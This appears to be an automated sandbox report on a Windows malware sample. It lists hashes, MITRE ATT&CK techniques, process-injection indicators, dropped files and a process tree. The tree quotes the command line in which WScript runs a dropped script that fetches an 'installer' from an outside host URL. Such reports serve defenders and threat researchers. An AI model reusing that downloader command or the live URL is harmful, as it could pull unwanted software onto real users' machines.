4011c1ff0499b113ddab626b1f240826095aba6d423b49bb7f42e6aecef8f5a1

Analysis

max time kernel
122s
max time network
123s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
31-10-2024 08:21

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

826e9f4ef3a8068d221387bbfccb4e47_JaffaCakes118.exe
Size

184KB
MD5

826e9f4ef3a8068d221387bbfccb4e47
SHA1

366587ec6129f05f3004d07f6bcb369cfea83897
SHA256

4011c1ff0499b113ddab626b1f240826095aba6d423b49bb7f42e6aecef8f5a1
SHA512

b73d36235b60b8645b8ddd2d2419c0790bc8a755494acf7205a36f920b7a723fc98e0b83c1165e6d3c3814ef0c1e8dcdb96f2806e311eba83c123327791aab02
SSDEEP

3072:/MzsU0S0w8Hp9Rc/LB+dJGESR4hIRSYaVvb1NVFJNndnO3Q:/7BSH8zUB+nGESaaRvoB7FJNndnF

Score

8^/10

discovery execution

Malware Config

Signatures

Blocklisted process makes network request 12 IoCs

flow	pid	Process
6	2388	WScript.exe
8	2388	WScript.exe
10	2388	WScript.exe
12	2868	WScript.exe
13	2868	WScript.exe
15	2368	WScript.exe
16	2368	WScript.exe
19	1524	WScript.exe
20	1524	WScript.exe
30	2780	WScript.exe
31	2780	WScript.exe
33	2780	WScript.exe

Command and Scripting Interpreter: JavaScript 1 TTPs
execution

JavaScript
T1059.007
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 6 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	826e9f4ef3a8068d221387bbfccb4e47_JaffaCakes118.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe

Suspicious use of WriteProcessMemory 20 IoCs

description	pid	Process	procid_target
PID 3044 wrote to memory of 2388	3044	826e9f4ef3a8068d221387bbfccb4e47_JaffaCakes118.exe	30
PID 3044 wrote to memory of 2388	3044	826e9f4ef3a8068d221387bbfccb4e47_JaffaCakes118.exe	30
PID 3044 wrote to memory of 2388	3044	826e9f4ef3a8068d221387bbfccb4e47_JaffaCakes118.exe	30
PID 3044 wrote to memory of 2388	3044	826e9f4ef3a8068d221387bbfccb4e47_JaffaCakes118.exe	30
PID 3044 wrote to memory of 2868	3044	826e9f4ef3a8068d221387bbfccb4e47_JaffaCakes118.exe	33
PID 3044 wrote to memory of 2868	3044	826e9f4ef3a8068d221387bbfccb4e47_JaffaCakes118.exe	33
PID 3044 wrote to memory of 2868	3044	826e9f4ef3a8068d221387bbfccb4e47_JaffaCakes118.exe	33
PID 3044 wrote to memory of 2868	3044	826e9f4ef3a8068d221387bbfccb4e47_JaffaCakes118.exe	33
PID 3044 wrote to memory of 2368	3044	826e9f4ef3a8068d221387bbfccb4e47_JaffaCakes118.exe	35
PID 3044 wrote to memory of 2368	3044	826e9f4ef3a8068d221387bbfccb4e47_JaffaCakes118.exe	35
PID 3044 wrote to memory of 2368	3044	826e9f4ef3a8068d221387bbfccb4e47_JaffaCakes118.exe	35
PID 3044 wrote to memory of 2368	3044	826e9f4ef3a8068d221387bbfccb4e47_JaffaCakes118.exe	35
PID 3044 wrote to memory of 1524	3044	826e9f4ef3a8068d221387bbfccb4e47_JaffaCakes118.exe	37
PID 3044 wrote to memory of 1524	3044	826e9f4ef3a8068d221387bbfccb4e47_JaffaCakes118.exe	37
PID 3044 wrote to memory of 1524	3044	826e9f4ef3a8068d221387bbfccb4e47_JaffaCakes118.exe	37
PID 3044 wrote to memory of 1524	3044	826e9f4ef3a8068d221387bbfccb4e47_JaffaCakes118.exe	37
PID 3044 wrote to memory of 2780	3044	826e9f4ef3a8068d221387bbfccb4e47_JaffaCakes118.exe	39
PID 3044 wrote to memory of 2780	3044	826e9f4ef3a8068d221387bbfccb4e47_JaffaCakes118.exe	39
PID 3044 wrote to memory of 2780	3044	826e9f4ef3a8068d221387bbfccb4e47_JaffaCakes118.exe	39
PID 3044 wrote to memory of 2780	3044	826e9f4ef3a8068d221387bbfccb4e47_JaffaCakes118.exe	39

C:\Users\Admin\AppData\Local\Temp\826e9f4ef3a8068d221387bbfccb4e47_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\826e9f4ef3a8068d221387bbfccb4e47_JaffaCakes118.exe"
1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3044
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fufB7AB.js" http://www.djapp.info/?domain=McLgObhzwP.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=UFAf_PI7Dh3IizD6k3VGXf8V7slq5pJZmGYrhLIFYhTJiUp2-KcxyCtDJmXHwE0C3Tqr4GalSgENm5FB509zxGLK81QpOOhYakyy C:\Users\Admin\AppData\Local\Temp\fufB7AB.exe
  2⤵
  - Blocklisted process makes network request
  - System Location Discovery: System Language Discovery
  PID:2388
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fufB7AB.js" http://www.djapp.info/?domain=McLgObhzwP.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=UFAf_PI7Dh3IizD6k3VGXf8V7slq5pJZmGYrhLIFYhTJiUp2-KcxyCtDJmXHwE0C3Tqr4GalSgENm5FB509zxGLK81QpOOhYakyy C:\Users\Admin\AppData\Local\Temp\fufB7AB.exe
  2⤵
  - Blocklisted process makes network request
  - System Location Discovery: System Language Discovery
  PID:2868
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fufB7AB.js" http://www.djapp.info/?domain=McLgObhzwP.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=UFAf_PI7Dh3IizD6k3VGXf8V7slq5pJZmGYrhLIFYhTJiUp2-KcxyCtDJmXHwE0C3Tqr4GalSgENm5FB509zxGLK81QpOOhYakyy C:\Users\Admin\AppData\Local\Temp\fufB7AB.exe
  2⤵
  - Blocklisted process makes network request
  - System Location Discovery: System Language Discovery
  PID:2368
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fufB7AB.js" http://www.djapp.info/?domain=McLgObhzwP.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=UFAf_PI7Dh3IizD6k3VGXf8V7slq5pJZmGYrhLIFYhTJiUp2-KcxyCtDJmXHwE0C3Tqr4GalSgENm5FB509zxGLK81QpOOhYakyy C:\Users\Admin\AppData\Local\Temp\fufB7AB.exe
  2⤵
  - Blocklisted process makes network request
  - System Location Discovery: System Language Discovery
  PID:1524
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fufB7AB.js" http://www.djapp.info/?domain=McLgObhzwP.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=UFAf_PI7Dh3IizD6k3VGXf8V7slq5pJZmGYrhLIFYhTJiUp2-KcxyCtDJmXHwE0C3Tqr4GalSgENm5FB509zxGLK81QpOOhYakyy C:\Users\Admin\AppData\Local\Temp\fufB7AB.exe
  2⤵
  - Blocklisted process makes network request
  - System Location Discovery: System Language Discovery
  PID:2780

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

JavaScript

T1059.007

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8B2B9A00839EED1DFDCCC3BFC2F5DF12

Filesize
1KB

MD5
67e486b2f148a3fca863728242b6273e

SHA1
452a84c183d7ea5b7c015b597e94af8eef66d44a

SHA256
facaf1c3a4bf232abce19a2d534e495b0d3adc7dbe3797d336249aa6f70adcfb

SHA512
d3a37da3bb10a9736dc03e8b2b49baceef5d73c026e2077b8ebc1b786f2c9b2f807e0aa13a5866cf3b3cafd2bc506242ef139c423eaffb050bbb87773e53881e

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B46811C17859FFB409CF0E904A4AA8F8

Filesize
436B

MD5
971c514f84bba0785f80aa1c23edfd79

SHA1
732acea710a87530c6b08ecdf32a110d254a54c8

SHA256
f157ed17fcaf8837fa82f8b69973848c9b10a02636848f995698212a08f31895

SHA512
43dc1425d80e170c645a3e3bb56da8c3acd31bd637329e9e37094ac346ac85434df4edcdbefc05ae00aea33a80a88e2af695997a495611217fe6706075a63c58

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8B2B9A00839EED1DFDCCC3BFC2F5DF12

Filesize
174B

MD5
ba34078a86b07753e656a38055a76b3c

SHA1
d8a47bf45f1cd7d7366f0c61924604b42223073e

SHA256
085eb84a0f7284bf7fcd4c43e797c46bbac6f2a1bc77d8093463d6ba55efcce2

SHA512
a08fc8001960108293d60cf65035310de9ae61b6ba951bfdbd08d3be4b2fb7f7899487a15e62daa8a3427814af75fbd74b212842017d9d7d4cf3c0db2e7e6375

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B46811C17859FFB409CF0E904A4AA8F8

Filesize
170B

MD5
f89a1c7654fe468796e648782d019afe

SHA1
a23fdaf1274749fe1f7026639ef2de93da84325b

SHA256
54bc55e58bcdbf96f82e37f461ca1015f901e7a4d66132086f4c5bce99c74c1c

SHA512
e4351e78e63ad90f1461db2f59fc14f05ece14d41a8f2bf851ec9fee7926ade55ea768d12094cc2987c49d99e28af8c41411f1df9ebcc10325816a6a23c4bcfe

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\7CNUR30T\domain_profile[1].htm

Filesize
8KB

MD5
3142725eb58b2daba6abeafa5fa904c4

SHA1
4e549df793a94eb3882753b4d6c6ae0f3d08a174

SHA256
c595abfd78eea3d49de8d813285b71eddb0ac1a28a71e642a901edf156abf2b0

SHA512
8bb32520c3927382e9138cc92fd147406b8cb450cc2e2c3ca905e1c811854dc9770fbd908903de00bb51c6100e11ec2031e49b505782b2147ad93f9881d8c906

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\7CNUR30T\domain_profile[1].htm

Filesize
8KB

MD5
4e4bb7d681172edd89b094f87c3b7e4a

SHA1
8975aa69fb3e1c8295c8a622d8b718d3111d579a

SHA256
bb41f673c912c73fe7e44b04be0355e87477ef620009639301c569caa432108f

SHA512
d574e11afeabf3f4c4c3fea429bbd860ed15a6214eb538bdaff53a0141bdc769405a02d3708fe7cd059e71df03a384918ae679140d5250c17b3eee9aeac1784f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\M4TQDAHL\domain_profile[1].htm

Filesize
8KB

MD5
bfa8cd177532854512f693aa2e00c47a

SHA1
32098edfcbff5f5f33c31c8b800de3235ed8b770

SHA256
79740bc40127f9f386e52cc1d637aa3947d5f38c54938fe5e3289bc28a2e53c1

SHA512
abadafe81d87fd22ed9c5bb273941a61cf6d379558f891e4239b4590823b18d8ee559d806ee335d16f14a50a701ac2fa9fdfd18335266468f4f3b37e2d94a31e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\M4TQDAHL\domain_profile[1].htm

Filesize
42KB

MD5
7b57c33618487bd0d1d5b4a0807982f0

SHA1
56c960c7d6e93f6b6054bbdca67ae59e0733fbc4

SHA256
8891a82ada8d4d7bfe440526bda8970b2208a3b37641c165474decc8e9349b5f

SHA512
eabf7a0e4bc73e5d7da375076d1ce9a8d4f75cf34221252e9503c26143c2c71b29133b9ec145f35b722b38c0b4cfc0e8b513bef5052fbdf67c08e5ade7f2e8eb

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cab2481.tmp

Filesize
70KB

MD5
49aebf8cbd62d92ac215b2923fb1b9f5

SHA1
1723be06719828dda65ad804298d0431f6aff976

SHA256
b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

SHA512
bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar4951.tmp

Filesize
181KB

MD5
4ea6026cf93ec6338144661bf1202cd1

SHA1
a1dec9044f750ad887935a01430bf49322fbdcb7

SHA256
8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

SHA512
6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

Download Submit
C:\Users\Admin\AppData\Local\Temp\fufB7AB.js

Filesize
3KB

MD5
3813cab188d1de6f92f8b82c2059991b

SHA1
4807cc6ea087a788e6bb8ebdf63c9d2a859aa4cb

SHA256
a3c5baef033d6a5ab2babddcfc70fffe5cfbcef04f9a57f60ddf21a2ea0a876e

SHA512
83b0c0ed660b29d1b99111e8a3f37cc1d2e7bada86a2a10ecaacb81b43fad2ec94da6707a26e5ae94d3ce48aa8fc766439df09a6619418f98a215b9d9a6e4d76

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\SX1PPZV1.txt

Filesize
177B

MD5
6871154f13eaf2ca5c2cabf175606aec

SHA1
38d183c608e687b0d9f0c96323b7496f44086c70

SHA256
098a1ef2eb53340d0d44d12efd71e79d6197c455b3ca5fb738c34f373dfb5b3f

SHA512
eeb978e0387a0cb097aa5a2f866127e4f181ee6ff089261eec5650b4e6f3038f363406059779831400b2b0840881b18e7478678019e915178e51bbe159f24586

Download Submit